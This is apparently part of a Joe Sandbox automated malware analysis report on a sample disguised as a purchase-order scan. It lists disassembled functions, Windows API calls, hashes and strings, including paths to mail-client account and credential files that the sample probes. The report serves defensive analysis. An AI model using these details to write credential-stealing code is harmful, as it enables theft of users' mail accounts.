                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: 5b4cd50ae64cae83e4a36349ff212637900d9054b688825dae163cb22e0ba00b
                                                                                • Instruction ID: d9f63688bc46c418505bd4b4429b8993f99258eea810eb802553a4623dee7966
                                                                                • Opcode Fuzzy Hash: 5b4cd50ae64cae83e4a36349ff212637900d9054b688825dae163cb22e0ba00b
                                                                                • Instruction Fuzzy Hash: C751E4F2610A16AFEB158E64CCC0FBB77AAEF42790F11066DFC18D6164EBB4DC518650
                                                                                APIs
                                                                                • _strlen.LIBCMT ref: 341D1607
                                                                                • _strcat.LIBCMT ref: 341D161D
                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,341D190E,?,?,00000000,?,00000000), ref: 341D1643
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,341D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 341D165A
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,341D190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 341D1661
                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,341D190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 341D1686
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                • String ID:
                                                                                • API String ID: 1922816806-0
                                                                                • Opcode ID: 811650400e33394dc7b27e0a4389474388267e3625b4b5d82fe8afcf2c9d1cb5
                                                                                • Instruction ID: 4987f6c3c1d6d3c7d57cabb388b046fcecbe2690b8204812b4a91d407c81a948
                                                                                • Opcode Fuzzy Hash: 811650400e33394dc7b27e0a4389474388267e3625b4b5d82fe8afcf2c9d1cb5
                                                                                • Instruction Fuzzy Hash: 5621DA76900604EFD704DB54DCC0EFE77B9EF8A710F14405AE504FB141EB74A94297A9
                                                                                APIs
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 341D1038
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 341D104B
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 341D1061
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 341D1075
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 341D1090
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 341D10B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                • String ID:
                                                                                • API String ID: 3594823470-0
                                                                                • Opcode ID: 9e9d6d3bde70e7af2c2e44d0dc7deaedc0f920c1402985c0b8f69776e060597d
                                                                                • Instruction ID: f53b84cb2ab423d533ec0c5ed54f3394574cbb229ba082d2af526c8ba3600574
                                                                                • Opcode Fuzzy Hash: 9e9d6d3bde70e7af2c2e44d0dc7deaedc0f920c1402985c0b8f69776e060597d
                                                                                • Instruction Fuzzy Hash: 862183B5900728DBDF50DA60DC88DEB376DEF85314F104296E855971A1DF309A96CB80
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,341D3518,341D23F1,341D1F17), ref: 341D3864
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 341D3872
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 341D388B
                                                                                • SetLastError.KERNEL32(00000000,?,341D3518,341D23F1,341D1F17), ref: 341D38DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 53351943af857007d340c92659986f697bee5a652ebb86470d8a66cd578a080c
                                                                                • Instruction ID: d675b3d1c1830952825f946919ee28f19c80edf0145dedd5c499829fde238f86
                                                                                • Opcode Fuzzy Hash: 53351943af857007d340c92659986f697bee5a652ebb86470d8a66cd578a080c
                                                                                • Instruction Fuzzy Hash: 710147FB659F1DAEF70016BA7CC89372B55DF47AB17200379E010A80D1EF5148529308
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,341D6C6C), ref: 341D5AFA
                                                                                • _free.LIBCMT ref: 341D5B2D
                                                                                • _free.LIBCMT ref: 341D5B55
                                                                                • SetLastError.KERNEL32(00000000,?,?,341D6C6C), ref: 341D5B62
                                                                                • SetLastError.KERNEL32(00000000,?,?,341D6C6C), ref: 341D5B6E
                                                                                • _abort.LIBCMT ref: 341D5B74
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: ca93ad640b67467516d12974e171d2b11ed4a3fcce62322680a41b945b2dc0eb
                                                                                • Instruction ID: 599c66a640a48143207e6b49a0e616108d34d017abb78bd4c9f6aa7b39ed3aa2
                                                                                • Opcode Fuzzy Hash: ca93ad640b67467516d12974e171d2b11ed4a3fcce62322680a41b945b2dc0eb
                                                                                • Instruction Fuzzy Hash: 1FF0A4FA605E00FEF78222356CC4E3A2B2BCFC3571B250164F814A6188FF248803427C
                                                                                APIs
                                                                                  • Part of subcall function 341D1E89: lstrlenW.KERNEL32(?,?,?,?,?,341D10DF,?,?,?,00000000), ref: 341D1E9A
                                                                                  • Part of subcall function 341D1E89: lstrcatW.KERNEL32(?,?,?,341D10DF,?,?,?,00000000), ref: 341D1EAC
                                                                                  • Part of subcall function 341D1E89: lstrlenW.KERNEL32(?,?,341D10DF,?,?,?,00000000), ref: 341D1EB3
                                                                                  • Part of subcall function 341D1E89: lstrlenW.KERNEL32(?,?,341D10DF,?,?,?,00000000), ref: 341D1EC8
                                                                                  • Part of subcall function 341D1E89: lstrcatW.KERNEL32(?,341D10DF,?,341D10DF,?,?,?,00000000), ref: 341D1ED3
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 341D122A
                                                                                  • Part of subcall function 341D173A: _strlen.LIBCMT ref: 341D1855
                                                                                  • Part of subcall function 341D173A: _strlen.LIBCMT ref: 341D1869
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                • API String ID: 4036392271-1520055953
                                                                                • Opcode ID: d5ac26403b7143685c24e666496f0c0c98e8ed79dff7c11d6e7f5576f12cb553
                                                                                • Instruction ID: e2f18146f95b46cb82a8e0070a2d60c68308b5e226487c919377afdf89e9187e
                                                                                • Opcode Fuzzy Hash: d5ac26403b7143685c24e666496f0c0c98e8ed79dff7c11d6e7f5576f12cb553
                                                                                • Instruction Fuzzy Hash: AC21A7B9E50A18ABE7109790ECC1FFEB33AEF80714F100556F605EB1D0EAB15D818B59
                                                                                APIs
                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3266236984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.3266213612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266261293.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266278879.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: *?|<>/":
                                                                                • API String ID: 589700163-165019052
                                                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,341D4AEA,?,?,341D4A8A,?,341E2238,0000000C,341D4BBD,00000000,00000000), ref: 341D4B59
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 341D4B6C
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,341D4AEA,?,?,341D4A8A,?,341E2238,0000000C,341D4BBD,00000000,00000000,00000001,341D2082), ref: 341D4B8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 89a7e513d61041755354917f35c0e9345c3c119a0c3d0881209418b49e11800d
                                                                                • Instruction ID: cad4aeb976d1374bcd8bcf8cc0a95a549a0a80381c3578138a2be72a6ce972c8
                                                                                • Opcode Fuzzy Hash: 89a7e513d61041755354917f35c0e9345c3c119a0c3d0881209418b49e11800d
                                                                                • Instruction Fuzzy Hash: 67F0AFB5901908FFDB019F91CC48FBEBFB9EF4A351F4041A8E805A6140DB348952DB99
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 341D715C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 341D717F
                                                                                  • Part of subcall function 341D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 341D5702
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 341D71A5
                                                                                • _free.LIBCMT ref: 341D71B8
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 341D71C7
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 138b58206374d9d9e43a35c27e822b9944fc88e4e23f1faf2074b3a59445b1ea
                                                                                • Instruction ID: 0568b41a20189a9cb8c937f49e83f8b2203d52e9128a105e612377e2b87a9ac2
                                                                                • Opcode Fuzzy Hash: 138b58206374d9d9e43a35c27e822b9944fc88e4e23f1faf2074b3a59445b1ea
                                                                                • Instruction Fuzzy Hash: A40188F7A02E15BF23110AB75CC8D7B7A6EDACB9A0351036DBD14D7204DF608C0282B4
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,341D636D,341D5713,00000000,?,341D2249,?,?,341D1D66,00000000,?,?,00000000), ref: 341D5B7F
                                                                                • _free.LIBCMT ref: 341D5BB4
                                                                                • _free.LIBCMT ref: 341D5BDB
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D5BE8
                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D5BF1
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: 8b699b5d81675d7fa4d83108e810a32e3c7e9b4691f727ae7af2c3e2198877f5
                                                                                • Instruction ID: 511185d860304dd6a873ad95c26923d87df31fe3b38407345c7dbdf25241728f
                                                                                • Opcode Fuzzy Hash: 8b699b5d81675d7fa4d83108e810a32e3c7e9b4691f727ae7af2c3e2198877f5
                                                                                • Instruction Fuzzy Hash: 0B01F9FA205F01FBB78266351CC4D3B2A2FDFC35B17610158F815A2149EF358803422C
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,341D10DF,?,?,?,00000000), ref: 341D1E9A
                                                                                • lstrcatW.KERNEL32(?,?,?,341D10DF,?,?,?,00000000), ref: 341D1EAC
                                                                                • lstrlenW.KERNEL32(?,?,341D10DF,?,?,?,00000000), ref: 341D1EB3
                                                                                • lstrlenW.KERNEL32(?,?,341D10DF,?,?,?,00000000), ref: 341D1EC8
                                                                                • lstrcatW.KERNEL32(?,341D10DF,?,341D10DF,?,?,?,00000000), ref: 341D1ED3
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat
                                                                                • String ID:
                                                                                • API String ID: 493641738-0
                                                                                • Opcode ID: dfad8981ce32876b74cbdde224590735be854ec63e93e61e172da7a0bdf1c3ec
                                                                                • Instruction ID: 42746cd11ee8d8a1b8e7f8339c2fa229b2ad8861e14f57558cb34de7f7d97148
                                                                                • Opcode Fuzzy Hash: dfad8981ce32876b74cbdde224590735be854ec63e93e61e172da7a0bdf1c3ec
                                                                                • Instruction Fuzzy Hash: 50F054B6541520BAD621271AACC5E7F777CEFC7B60F444019F50893190DB54585393A9
                                                                                APIs
                                                                                • _free.LIBCMT ref: 341D91D0
                                                                                  • Part of subcall function 341D571E: HeapFree.KERNEL32(00000000,00000000,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?), ref: 341D5734
                                                                                  • Part of subcall function 341D571E: GetLastError.KERNEL32(?,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?,?), ref: 341D5746
                                                                                • _free.LIBCMT ref: 341D91E2
                                                                                • _free.LIBCMT ref: 341D91F4
                                                                                • _free.LIBCMT ref: 341D9206
                                                                                • _free.LIBCMT ref: 341D9218
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: a0cad64156221a95085f408a7c1a202a176454a5abbf6ca9e2144ea92bfb073f
                                                                                • Instruction ID: e744516e0bc6944485f60b1fe9af38c4e76c2a767d45a27f19d294bfdda42a71
                                                                                • Opcode Fuzzy Hash: a0cad64156221a95085f408a7c1a202a176454a5abbf6ca9e2144ea92bfb073f
                                                                                • Instruction Fuzzy Hash: D0F04FF9924E44DBC650DA99D5C5C267BDBEA06321BA02949E809E7504CB30F8D08E58
                                                                                APIs
                                                                                • _free.LIBCMT ref: 341D536F
                                                                                  • Part of subcall function 341D571E: HeapFree.KERNEL32(00000000,00000000,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?), ref: 341D5734
                                                                                  • Part of subcall function 341D571E: GetLastError.KERNEL32(?,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?,?), ref: 341D5746
                                                                                • _free.LIBCMT ref: 341D5381
                                                                                • _free.LIBCMT ref: 341D5394
                                                                                • _free.LIBCMT ref: 341D53A5
                                                                                • _free.LIBCMT ref: 341D53B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 29443cae553fb3c107a9384f61df5789157fb7b599ea8898a7f81e999b033d24
                                                                                • Instruction ID: 6145902dcb3bab3ee3443d9ee068aa8caaa5f3cfae3ad48c2f78df1578173263
                                                                                • Opcode Fuzzy Hash: 29443cae553fb3c107a9384f61df5789157fb7b599ea8898a7f81e999b033d24
                                                                                • Instruction Fuzzy Hash: DEF036BD834E28DF9B425FA695C08183BB2F7156103512245F411B3354D73154E39B8D
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\scan_241205-801_draft_PO.exe,00000104), ref: 341D4C1D
                                                                                • _free.LIBCMT ref: 341D4CE8
                                                                                • _free.LIBCMT ref: 341D4CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Users\user\Desktop\scan_241205-801_draft_PO.exe
                                                                                • API String ID: 2506810119-3315253841
                                                                                • Opcode ID: eb578849e44d3f599a87009e5e5396dfc630d4a5b1b77d995aa132b981729af6
                                                                                • Instruction ID: f3288c86c6c6c00ec952b8ec57a21979e3b48eddc2e5fc96296680bce74ff74e
                                                                                • Opcode Fuzzy Hash: eb578849e44d3f599a87009e5e5396dfc630d4a5b1b77d995aa132b981729af6
                                                                                • Instruction Fuzzy Hash: 0F3162F5A10B18EFEB11DF9989C09AEFBFDEB86350F1041AAE804A7210D7708A41DB55
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,341D6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 341D8731
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 341D87BA
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 341D87CC
                                                                                • __freea.LIBCMT ref: 341D87D5
                                                                                  • Part of subcall function 341D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 341D5702
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: 8cec2d8bd526e0711c7b1f47fc886bcfd6f70e07b0ba745e860d45c79b97cca6
                                                                                • Instruction ID: 11ec782a91a7f5ed56cf1005afc45d3bc4fab338e0af13e3d75599de3fe89134
                                                                                • Opcode Fuzzy Hash: 8cec2d8bd526e0711c7b1f47fc886bcfd6f70e07b0ba745e860d45c79b97cca6
                                                                                • Instruction Fuzzy Hash: C431AEB6A00A1AEFEF158F66CC80DBF7BA6EB46350F010168EC14D7160E775D951CB90
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,341D1D66,00000000,00000000,?,341D5C88,341D1D66,00000000,00000000,00000000,?,341D5E85,00000006,FlsSetValue), ref: 341D5D13
                                                                                • GetLastError.KERNEL32(?,341D5C88,341D1D66,00000000,00000000,00000000,?,341D5E85,00000006,FlsSetValue,341DE190,FlsSetValue,00000000,00000364,?,341D5BC8), ref: 341D5D1F
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,341D5C88,341D1D66,00000000,00000000,00000000,?,341D5E85,00000006,FlsSetValue,341DE190,FlsSetValue,00000000), ref: 341D5D2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 3177248105-0
                                                                                • Opcode ID: 976b3500110d4cc54f1d4e9564cce942c3f0a3ef4976b4d2d9a956027ec03e2e
                                                                                • Instruction ID: 5a5ee9f70906b0dfbc762d04ce62b7e1a78befa4db9b5d89ba67ee0de5d5058f
                                                                                • Opcode Fuzzy Hash: 976b3500110d4cc54f1d4e9564cce942c3f0a3ef4976b4d2d9a956027ec03e2e
                                                                                • Instruction Fuzzy Hash: 800128BA702F22ABD3114A699C88A663758EF437E1B110624F907E7144CB20D412C7F0
                                                                                APIs
                                                                                • _free.LIBCMT ref: 341D655C
                                                                                  • Part of subcall function 341D62BC: IsProcessorFeaturePresent.KERNEL32(00000017,341D62AB,00000000,?,?,?,?,00000016,?,?,341D62B8,00000000,00000000,00000000,00000000,00000000), ref: 341D62BE
                                                                                  • Part of subcall function 341D62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 341D62E0
                                                                                  • Part of subcall function 341D62BC: TerminateProcess.KERNEL32(00000000), ref: 341D62E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                • String ID: *?$.
                                                                                • API String ID: 2667617558-3972193922
                                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction ID: 5db19a5a883fffe3b7163565e471733201ae7f0d14fd2f2bd02abe81f75c5c96
                                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                • Instruction Fuzzy Hash: CF51AFB5E10609EFEB04DFA8C8C0ABDBBB5EF49354F2481A9D854E7354E7359A01CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: : $Se.
